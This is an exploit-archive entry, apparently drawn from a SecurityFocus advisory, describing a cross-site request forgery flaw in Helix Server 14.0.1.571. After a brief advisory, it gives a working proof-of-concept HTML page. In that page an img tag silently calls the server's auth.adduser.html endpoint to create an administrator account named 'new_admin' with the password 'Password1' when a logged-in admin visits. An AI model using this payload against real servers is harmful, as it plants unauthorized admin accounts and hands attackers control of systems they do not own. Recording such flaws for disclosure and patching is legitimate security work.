13 lines
No EOL
517 B
HTML
13 lines
No EOL
517 B
HTML
source: https://www.securityfocus.com/bid/45340/info
|
|
|
|
Helix Server is prone to a cross-site request-forgery vulnerability.
|
|
|
|
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
|
|
|
|
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
|
|
|
|
<html>
|
|
<body>
|
|
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
|
|
</body>
|
|
</html> |